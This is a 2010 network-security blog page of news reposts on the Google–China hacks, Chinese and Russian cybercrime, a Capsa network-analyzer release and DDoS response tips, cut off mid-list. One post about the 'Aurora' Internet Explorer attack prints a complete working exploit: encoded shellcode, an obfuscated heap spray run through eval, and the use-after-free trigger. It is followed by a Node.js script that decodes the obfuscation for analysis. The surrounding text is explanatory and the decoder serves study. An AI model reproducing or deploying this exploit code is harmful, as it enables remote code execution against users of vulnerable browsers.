Google Turns to Spy Agency for Help With Inquiry Into Cyberattacks

February 8th, 2010 | Network Analyzer, Network Security | No Comments »

Google has turned to the National Security Agency for technical assistance to learn more about the computer network attackers who breached the company’s cybersecurity defenses last year, a person with direct knowledge of the agreement said Thursday.

The collaboration between Google, the world’s largest search engine company, and the federal agency in charge of global electronic surveillance raises both civil liberties issues and new questions about how much Google knew about the electronic thefts it experienced when it stated last month that it might end its business operations in China, where it said the attacks originated. The agreement was first reported on Wednesday evening by The Washington Post.

By turning to the N.S.A., which has no statutory authority to investigate domestic criminal acts, instead of the Department of Homeland Security, which does have such authority, Google is clearly seeking to avoid having its search engine, e-mail and other Web services regulated as part of the nation’s “critical infrastructure.”

The United States government has become increasingly concerned about the computer risks confronting energy and water distribution systems and financial and communications networks. Systems designated as critical infrastructure are increasingly being held to tighter regulatory standards.

On Jan. 12, Google announced a “new approach to China,” stating that the attacks were “highly sophisticated” and came from China. At the time, it gave few details about the attacks other than to say that a theft of its intellectual property had occurred and that a primary goal of the attackers had been to gain access to the Gmail accounts of Chinese human rights activists.

In reaching out to the N.S.A., which has extensive abilities to monitor global Internet traffic, the company may have been hoping to gain more certainty about the identity of the attackers. A number of computer security consultants who worked with other companies that experienced attacks similar to those of Google have stated that the surveillance system was controlled from a series of compromised server computers based in Taiwan. It is not clear how Google determined that the attacks originated in China.

A Google spokeswoman said the company was declining to comment on the case beyond what it published last month. An N.S.A. spokeswoman said, “N.S.A. is not able to comment on specific relationships we may or may not have with U.S. companies,” but added, the agency worked with “a broad range of commercial partners” to ensure security of information systems.

The agency’s responsibility to secure the government’s computer networks almost certainly was another reason Google turned to it, said a former federal computer security specialist.

“This is the other side of N.S.A. — this is the security service that does defensive measures,” said the specialist, James A. Lewis, a director at the Center for Strategic and International Studies. “It’s not unusual for people to go to N.S.A. and say ‘please take a look at my code.’ ”

The agreement will not permit the agency to have access to information belonging to Google users, but it still reopens long-standing questions about the role of the agency.

“Google and N.S.A. are entering into a secret agreement that could impact the privacy of millions of users of Google’s products and services around the world,” said Marc Rotenberg, executive director of the Electronic Privacy Information Center, a Washington-based policy group. On Thursday, the organization filed a lawsuit against the N.S.A., calling for the release of information about the agency’s role as it was set out in National Security Presidential Directive 54/Homeland Security Presidential Directive 23, a classified 2008 order issued by President George W. Bush dealing with cybersecurity and surveillance.

Concerns about the nation’s cybersecurity have greatly increased in the past two years. On Tuesday, Dennis C. Blair, the director of national intelligence, began his annual threat testimony before Congress by saying that the threat of a crippling attack on telecommunications and other computer networks was growing, as an increasingly sophisticated group of enemies had “severely threatened” the sometimes fragile systems behind the country’s information infrastructure.

“Malicious cyberactivity is occurring on an unprecedented scale with extraordinary sophistication,” he told the committee.

The relationship that the N.S.A. has struck with Google is known as a cooperative research and development agreement, according to a person briefed on the relationship. These were created as part of the Federal Technology Transfer Act of 1986 and are essentially a written agreement between a private company and a government agency to work together on a specific project. They are intended to help accelerate the commercialization of government-developed technology.

In addition to the N.S.A., Google has been working with the F.B.I. on the attack inquiry, but the bureau has so far declined to comment publicly or to share information about the intrusions with Congress.


Why Russia Excels in the New Cybercrime

February 7th, 2010 | Network Security | No Comments »

The St Petersburg link to the hacking debacle has highlighted what Russians have long known: their excellence in cybercrime.

Russian hackers have shown time and again that they can break into the networks of foreign governments, multinationals and banks and then create havoc. Graduates of Soviet universities, most of them Jewish émigrés, have long provided programmers for companies in America and Israel.

But many of today’s Russian whiz-kids prefer the challenge and rewards of hacking. Most of the best known Western internet providers pulled out of Russia long ago after being robbed of tens of thousands of pounds by computer criminals.

Already this year St Petersburg hackers have been charged with defrauding telephone companies of up to £70,000 by stealing passwords and selling them to foreign students to make cheap calls home. Another hacker has been accused of gaining access to 300,000 credit card numbers. Arguably the most famous computer fraudster, Vladimir Levin, came from St Petersburg. He was sentenced in America to three years in jail for defrauding Citibank.

Russian computer hooligans are also thought to have played a major role in disrupting Nato e-mail systems during last year’s bombing of Yugoslavia. The formidable calibre of graduates from Soviet, and later Russian, maths and physics institutes is one explanation for the country’s status as a world leader in computer crime.

Even before personal computers reached the Soviet Union, the brightest Russians understood how they worked better than many of their counterparts in the West.


Hacking for Fun and Profit in China’s Underworld

February 5th, 2010 | Network Security, Uncategorized | No Comments »

CHANGSHA, China — With a few quick keystrokes, a computer hacker who goes by the code name Majia calls up a screen displaying his latest victims.

“Here’s a list of the people who’ve been infected with my Trojan horse,” he says, working from a dingy apartment on the outskirts of this city in central China. “They don’t even know what’s happened.”

As he explains it, an online “trapdoor” he created just over a week ago has already lured 2,000 people from China and overseas — people who clicked on something they should not have, inadvertently spreading a virus that allows him to take control of their computers and steal bank account passwords.

Majia, a soft-spoken college graduate in his early 20s, is a cyberthief.

He operates secretly and illegally, as part of a community of hackers who exploit flaws in computer software to break into Web sites, steal valuable data and sell it for a profit.

Internet security experts say China has legions of hackers just like Majia, and that they are behind an escalating number of global attacks to steal credit card numbers, commit corporate espionage and even wage online warfare on other nations, which in some cases have been traced back to China.

Three weeks ago, Google blamed hackers that it connected to China for a series of sophisticated attacks that led to the theft of the company’s valuable source code. Google also said hackers had infiltrated the private Gmail accounts of human rights activists, suggesting the effort might have been more than just mischief.

In addition to independent criminals like Majia, computer security specialists say there are so-called patriotic hackers who focus their attacks on political targets. Then there are the intelligence-oriented hackers inside the People’s Liberation Army, as well as more shadowy groups that are believed to work with the state government.

Indeed, in China — as in parts of Eastern Europe and Russia — computer hacking has become something of a national sport, and a lucrative one. There are hacker conferences, hacker training academies and magazines with names like Hacker X Files and Hacker Defense, which offer tips on how to break into computers or build a Trojan horse, step by step.

For less than $6, one can even purchase the “Hacker’s Penetration Manual.” (Books on hacking are also sold, to a lesser extent, in the United States and elsewhere.)

And with 380 million Web users in China and a sizzling online gaming market, analysts say it is no wonder Chinese youths are so skilled at hacking. Many Chinese hackers interviewed over the last few weeks describe a loosely defined community of computer devotees working independently, but also selling services to corporations and even the military. Because it is difficult to trace hackers, exactly who is behind any specific attack and how and where they operate remains to a large extent a mystery, technology experts say.

And that is just the way Majia, the young Chinese hacker, wants it. On condition that he not be identified by his real name, Majia agreed two weeks ago to allow a reporter to visit his modest home in a poor town outside Changsha, and watch him work.

Slim and smartly dressed in black, Majia seemed eager to tell his story; like many hackers, he wants recognition for his hacking skills even as he prizes anonymity to avoid detection. The New York Times found him through another well-known hacker who belongs to a hacker group and vouched that Majia was skilled at what he did.

While Majia’s claims, of course, cannot be verified, he is happy to demonstrate his hacking skills. He met a journalist at a cafe one night just over a week ago, and then invited him to his home, where he showed how he hacked into the Web site of a Chinese company. Once the Web site popped up on his screen, he created additional pages and typed the word “hacked” onto one of them.

Majia says he fell in love with hacking in college, after friends showed him how to break into computer systems during his freshman year.

After earning a degree in engineering, he took a job with a government agency, largely to please his parents. But every night after work, he turns to his passion: hacking.

He is consumed by the challenges it presents. He reads hacker magazines, swaps information with a small circle of hackers and writes malicious code. He uses Trojan horses to sneak into people’s computers and infect them, so he can take control.

“Most hackers are lazy,” he says, seated in front of a computer in his spare bedroom, which overlooks a dilapidated apartment complex. “Only a few of us can actually write code. That’s the hard part.”

Computer hacking is illegal in China. Last year, Beijing revised and stiffened a law that makes hacking a crime, with punishments of up to seven years in prison. Majia seems to disregard the law, largely because it is not strictly enforced. But he does take care to cover his tracks.

Partly, he admits, the lure is money. Many hackers make a lot of money, he says, and he seems to be plotting his own path. Exactly how much he has earned, he won’t say. But he does admit to selling malicious code to others; and boasts of being able to tap into people’s bank accounts by remotely operating their computers.

Financial incentives motivate many young Chinese hackers like Majia, experts say. Scott J. Henderson, author of “The Dark Visitor: Inside the World of Chinese Hackers,” said he had spent years tracking Chinese hackers, sometimes with financial help from the United States government. One Chinese hacker who broke into a United States government site later lectured on hacking at a leading university, Mr. Henderson said, and worked for China’s security ministry. But recently, many have been seeking to profit from stealing data from big corporations, he said, or teaching others how to hijack computers.

“They make a lot of money selling viruses and Trojan horses to infect other people’s computers,” Mr. Henderson said in a telephone interview. “They also break into online gaming accounts, and sell the virtual characters. It’s big money.”

Majia lives with his parents, and his bedroom has little more than a desktop computer, a high-speed Internet connection and a large closet. The walls are bare.

Most of his socializing occurs online, where he works from about 6:30 p.m. to 12:30 a.m., starting every evening by perusing computer Web sites like cnBeta.com.

Asked why he doesn’t work for a major Chinese technology company, he sneers at the suggestion, saying that it would restrain his freedom.

He even claims to know details of the Google attack. “That Trojan horse on Google was created by a foreign hacker,” he says, indicating that the virus was then altered in China. “A few weeks before Google was hijacked, there was a similar virus. If you opened a particular page on Google, you were infected.”

Oddly, Majia said his parents did not know that he was hacking at night. But at one point, he explained the intricacies of computer hacking and stealing data while his mother stood nearby, listening silently, while offering a guest oranges and candy.

Majia and his fellow hackers keep secret their knowledge of certain so-called zero-day vulnerabilities — software flaws — for future use, he says.

“Microsoft and Adobe have a lot of zero days,” he said, while scanning Web sites at home. “But we don’t publish them. We want to save them so that some day we can use them.”

When asked whether hackers work for the government, or the military, he says “yes.”

Does he? No comment, he says.


The “Aurora” IE Exploit Used Against Google in Action

February 5th, 2010 | Network Security | No Comments »

The big news hit earlier this week that the attack vector that let bad actors, presumably from China, into the networks of Google, Juniper, Adobe and some 29 other firms was an Internet Explorer zero day: a use-after-free vulnerability in which IE dereferences an invalid pointer to an object that has already been freed. The bug affects IE 6, 7 and 8, but according to Microsoft the attackers only used it against IE 6. Per Microsoft Security Advisory 979352: “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.” Earlier today, yesterday’s analysis entry at Wepawet (an online analysis engine for malware) was pointed out to H.D. Moore, and within hours Metasploit had an exploit for the vulnerability integrated. McAfee has confirmed that the public exploit is the same one it saw during the investigation. The video below demonstrates how crackers initially gained access to the corporate networks of Google et al. using this zero-day attack.

Here It Is

The video below demonstrates how Google and the rest have been, according to most news reports, exploited via the “Aurora” vulnerability in Internet Explorer, and had their “intellectual property” taken.

In the video you will see Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.

A silly example for demonstration to be sure, but once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.

The Vector

The attack scenario is that users were pointed to a web site (probably through a targeted e-mail, an attack called spear phishing) carrying JavaScript that first sprays the heap with the included shellcode and then triggers the reference to the freed object, so that the invalid pointer lands in the sprayed memory. The code below was released publicly yesterday.

<html><script>
// Stage 1: the shellcode. unescape() turns each %uXXXX into one UTF-16 code
// unit, which sits in memory as two little-endian bytes (%u9090%u19eb -> 90 90 eb 19).
var sc = unescape(
"%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805" +
"%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2" +
"%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053" +
"%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8" +
"%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8" +
"%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2" +
"%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f" +
"%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7" +
"%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727" +
"%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6" +
"%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923" +
"%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2" +
"%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8" +
"%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8" +
"%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820" +
"%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8" +
"%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854" +
"%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84" +
"%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4" +
"%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153" +
"%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30" +
"%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e" +
"%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b" +
"%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb" +
"%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c" +
"%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498" +
"%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0" +
"%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc" +
"%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8" +
"%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038" +
"%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e" +
"%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727" +
"%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703" +
"%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653" +
"%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5" +
"%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb" +
"%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be" +
"%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7" +
"%ubcb9%ub2f6%ubfa8%u00d8");

// Stage 2: the heap-spray code, hidden as character codes multiplied by 7.
// Decoded and eval()ed, it reads:
//   var n=unescape("%u0c0d%u0c0d"); while(n.length<=524288) n+=n;
//   n=n.substring(0,524269-sc.length); var x=new Array();
//   for(var i=0;i<200;i++) {x[i]=n+sc;}
// i.e. 200 blocks of roughly 1 MiB, each a 0x0c0d0c0d slide ending in the shellcode.
// '@' stands in for ',' because the commas toString() inserts are stripped first.
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i++) {
  arr[i] = String.fromCharCode(sss[i] / 7);
}
var cc = arr.toString();
cc = cc.replace(/,/g, "");
cc = cc.replace(/@/g, ",");
eval(cc);

// Stage 3: 200 COMMENT elements. Their data is rewritten later so that the
// memory of the freed object gets reoccupied by 0x0c0d0c0d.
var x1 = new Array();
for (i = 0; i < 200; i++) {
  x1[i] = document.createElement("COMMENT");
  x1[i].data = "abc";
}
var e1 = null;
function ev1(evt) {
  // Keep a copy of the event, then destroy the <img> that fired it by
  // emptying its span. The event object still points at the freed element.
  e1 = document.createEventObject(evt);
  document.getElementById("sp1").innerHTML = "";
  window.setInterval(ev2, 50);
}
function ev2() {
  // 42 x 0x0c0d: refill the freed allocation so the dangling pointer
  // (and the vtable read through it) resolves into the sprayed region.
  p = "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d" +
      "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d" +
      "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
  for (i = 0; i < x1.length; i++) {
    x1[i].data = p;
  }
  // Touching srcElement dereferences the freed object: this is the use after free.
  var t = e1.srcElement;
}
</script><body><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>
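Both obfuscation layers in the page above can be unpacked statically, without ever loading it in a browser. The following is an added triage example written for this page; it is not part of the original exploit, of Metasploit or of Wepawet. It reverses the charcode-divided-by-7 layer to recover the heap-spray source and turns the `%uXXXX`-escaped shellcode into the little-endian bytes it occupies in memory. The `SSS` array is copied from the exploit above; `SHELLCODE_HEAD` is only the first 15 `%u` units of the shellcode, used here as a constructed sample, and the function names are this example's own.

```javascript
// Added triage example: statically unpack the two obfuscation layers of the
// Aurora page quoted above. Runs under Node.js; nothing here needs a browser.

// Layer 1 input: the sss array copied verbatim from the exploit.
const SSS = [826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
  238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
  728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
  350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
  805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
  322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
  224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
  735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
  735, 651, 427, 770, 301, 805, 693, 413, 875];

// Layer 2 input: the first 15 %u units of the shellcode (constructed sample).
const SHELLCODE_HEAD =
  "%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805";

// Reverse the charcode layer. The exploit does String.fromCharCode(sss[i]/7),
// joins with toString() (which inserts commas), strips every comma and finally
// maps '@' back to ','. Joining with '' and then mapping '@' is equivalent.
function decodeCharcodeArray(codes, divisor = 7) {
  const chars = codes.map((c) => {
    if (c % divisor !== 0) {
      throw new Error(`code ${c} is not a multiple of ${divisor}; wrong key?`);
    }
    return String.fromCharCode(c / divisor);
  });
  return chars.join("").replace(/@/g, ",");
}

// Turn a %uXXXX / %XX escaped string into the bytes it occupies in memory.
// unescape() yields UTF-16 code units; on a little-endian x86 host each
// %uHHLL unit is stored as the two bytes LL HH, so %u9090%u19eb is 90 90 eb 19.
function unescapeToBytes(escaped) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g;
  let pos = 0;
  let m;
  while ((m = re.exec(escaped)) !== null) {
    if (m.index !== pos) {
      throw new Error(`unexpected literal text at offset ${pos}`);
    }
    if (m[1] !== undefined) {
      const unit = parseInt(m[1], 16);
      bytes.push(unit & 0xff, unit >> 8); // little-endian
    } else {
      // a bare %XX is one code unit 0x00XX, stored as XX 00
      bytes.push(parseInt(m[2], 16), 0x00);
    }
    pos = re.lastIndex;
  }
  if (pos !== escaped.length) {
    throw new Error(`trailing literal text at offset ${pos}`);
  }
  return Uint8Array.from(bytes);
}

// Pull the spray parameters out of the decoded source.
function spraySummary(src) {
  const pattern = /unescape\("((?:%u[0-9a-fA-F]{4})+)"\)/.exec(src);
  const blocks = /i<(\d+);/.exec(src);
  const limit = /n\.length<=(\d+)/.exec(src);
  return {
    fillPattern: pattern ? pattern[1] : null,      // what the slide is made of
    blockCount: blocks ? Number(blocks[1]) : null, // how many blocks are allocated
    minLengthUnits: limit ? Number(limit[1]) : null, // UTF-16 units per block (x2 for bytes)
  };
}

// Count leading 0x90 (NOP) bytes; a sled in front of real code is a quick tell.
function nopSledLength(bytes) {
  let n = 0;
  while (n < bytes.length && bytes[n] === 0x90) n++;
  return n;
}

const sprayJs = decodeCharcodeArray(SSS);
const head = unescapeToBytes(SHELLCODE_HEAD);
console.log(sprayJs);
console.log(spraySummary(sprayJs));
console.log(Buffer.from(head).toString("hex"));
console.log("nop sled:", nopSledLength(head), "bytes");
```

The decoded spray source shows the plan in one line: a 1 MiB block (524288 UTF-16 units) of `0x0c0d` repeated, trimmed so that the shellcode fits at its end, allocated 200 times. The pattern `0x0c0d0c0d` is both the address the freed object is made to point at and, read as x86, a harmless slide of `or` instructions, so landing anywhere inside a block slides into the shellcode. The byte view of the shellcode head shows two NOPs followed by `eb 19`, a short jump past the decoder's data.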

Update

  • Ahmed Obied has also published a clean Python version of the exploit (it opens Windows Calculator) for testing: ie_aurora.py.
  • CVE-2010-0249 has been opened for this issue.

Finally

“At this time, we are aware of limited, active attacks attempting to use this vulnerability against Internet Explorer 6. We have not seen attacks against other affected versions of Internet Explorer.” – Microsoft.

This situation has the potential to change rapidly now that the exploit is public. Microsoft last patched a vulnerability out of cycle in July 2009; it could elect to take the same route here.

Or as McAfee correctly opines: “What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.”


Capacity, Customization, Interface, All Enhanced in Capsa Network Analyzer 7.1

February 4th, 2010 | Colasoft Capsa | No Comments »

Colasoft Announced the Release of Capsa Network Analyzer 7.1

Chengdu, China - February 3, 2010 - Colasoft, an innovative provider of all-in-one, easy-to-use network analyzer software, today announced the newest version of its flagship product, Capsa Network Analyzer. Version 7.1 is built on the second-generation Colasoft Packet Analysis Engine (CSPAE), which substantially improves data-processing speed and sustains analysis performance on high-traffic networks.

“With the latest Microsoft Office 2007 style, Colasoft Capsa 7.1 provides a brand new user interface and enhanced user experience. The new design is intended to display statistics and diagnosis data in a simple, straightforward, graphical style so that users can get what they want with fewer clicks,” said Kevin Zhou, director of marketing. “Some unique features and ideas are introduced in Capsa 7.1, like Network Profile. This function allows users to set and save network profiles for different environments (departments, clients), making their analysis more customized, accurate and efficient. Another prominent feature is Analysis Profile, which provides flexible, extensible and effective analysis based on the user’s analysis objectives.”

Following are the top 10 new features in Capsa 7.1:

  • Brand New and Improved Network Analysis Experience
  • Your Own Dashboard, Important Parameters in One Place and in Graphs.
  • Record Network Profile, Boost Working Efficiency.
  • Set Your Analysis Profile, Perform customized Analysis.
  • Powerful Customizable Alarms.
  • Replay Analysis, Reproduce History Network Events
  • Custom Protocol, Analyze Unique Protocol Traffic.
  • Enhanced, Customizable Report.
  • Intuitive TCP Timing Sequence Chart.
  • WYSIWYG (What You See Is What You Get) Packet Filter.

Capsa 7.1 runs under Windows XP/2003/Vista/7. A trial version is available for download at the company’s website: http://www.colasoft.com/download/

About Capsa

Capsa is an easy-to-use Ethernet packet sniffer (network analyzer or network sniffer) for network monitoring and troubleshooting purposes. It performs real-time packet capturing, 24/7 network monitoring, reliable network forensics, advanced protocol analyzing, in-depth packet decoding, and automatic expert diagnosing. By giving you insights into all of your network’s operations, Capsa makes it easy to isolate and solve network problems, identify network bottleneck and bandwidth use, and detect network vulnerabilities.

About Colasoft

Ever since 2001, Colasoft has been an innovative provider of all-in-one and easy-to-use software solutions for users to monitor network activities, analyze network performance, enhance network security, and troubleshoot network problems. Currently, more than 5000 customers in over 80 countries trust the company’s flagship product, Capsa Network Analyzer, as their network monitoring and troubleshooting solution. Featured customers include Alcatel, Airbus, Dell, Ericsson, IBM, Intel, and Pepsi. For more information about Colasoft and its solutions, please visit http://www.colasoft.com/


Colasoft Capsa Network Analyzer 7.1 will be released soon

February 3rd, 2010 | Colasoft Capsa | No Comments »


Colasoft, an innovative provider of all-in-one, easy-to-use network analyzer software, will release the newest version of its flagship product, Capsa Network Analyzer. Version 7.1 is built on the second-generation Colasoft Packet Analysis Engine (CSPAE), which substantially improves data-processing speed and sustains analysis performance on high-traffic networks.

“With the latest Microsoft Office 2007 style, Colasoft Capsa 7.1 provides a brand new user interface and enhanced user experience. The new design is intended to display statistics and diagnosis data in a simple, straightforward, graphical style so that users can get what they want with fewer clicks,” said Kevin Zhou, director of marketing. “Some unique features and ideas are introduced in Capsa 7.1, like Network Profile. This function allows users to set and save network profiles for different environments (departments, clients), making their analysis more customized, accurate and efficient. Another prominent feature is Analysis Profile, which provides flexible, extensible and effective analysis based on the user’s analysis objectives.”



The Top 10 Things To Do While Under DDoS Attack

January 28th, 2010 | Network Security, VoIP | No Comments »

In my past decade-plus dealing with distributed denial-of-service attacks, I have noticed a few patterns in the way companies handle them. When an unprepared company is attacked for the first time, all hell usually breaks loose. The lack of preparedness sets off chain reactions that make the situation worse. Addressing the most common mistakes ahead of time can help a situation tremendously.

When someone calls me for advice, the first few items I go over have nothing to do with fixing the attack. I’m giving advice that I think is common sense, and I’ve been surprised that others don’t find it obvious.

Here are my Top 10 To-do’s for making life less painful during an attack.

1. Don’t Panic

While the network and your services are exploding and bouncing offline, there must be someone that is comfortable enough to make good decisions. I’ve seen managers freak out and threaten everyone with the prospect of the company collapsing. I think they were trying to motivate people to figure out some solution, but they ended up creating more chaos during an already tough situation.

Once I saw employees hastily rip out the network’s firewalls and re-configure the load balancers. They ended up creating more mess than they had before because they were reacting to an angry and stressed manager.

You are going to create a disaster if you approach with a sledgehammer and wishes. Don’t let anyone make quick changes; try to follow your company’s policies. Sit back, analyze the problem, isolate the actual device that’s failing in the chain, and make an informed–and usually small–adjustment.

If you’re in the 10th hour and things don’t seem to be improving, gather everyone, go away from the office, have a beer, relax for 15 minutes, and talk about something positive. The information flow after that beer might just save you and motivate everyone to do a good job – the solution will come!

2. Create a contact list of external email addresses and phone numbers.

This one is sadistically funny. Most companies host their email, VoIP system, IRC, Wiki, databases, primary storage, etc. all in the same colocation behind the same network connection that hosts their web sites and services. This is, for lack of better words, stupid. All of your digital eggs are in one basket, and that basket is also holding a grenade. A DDoS attack ends up crippling the company’s infrastructure, leaving it with no phones, email, or any communications structure whatsoever.

I’ve seen CEOs of massive companies using their hotmail account and cell phone to contact me because it was their only way of communicating from their multi-million dollar offices.

If you insist on being an “eggs in one basket” company, keep a list of vital email accounts and cell phone numbers on a notepad. That way you can at least call your IT person when everything is down.

3. Set up a “War Room”

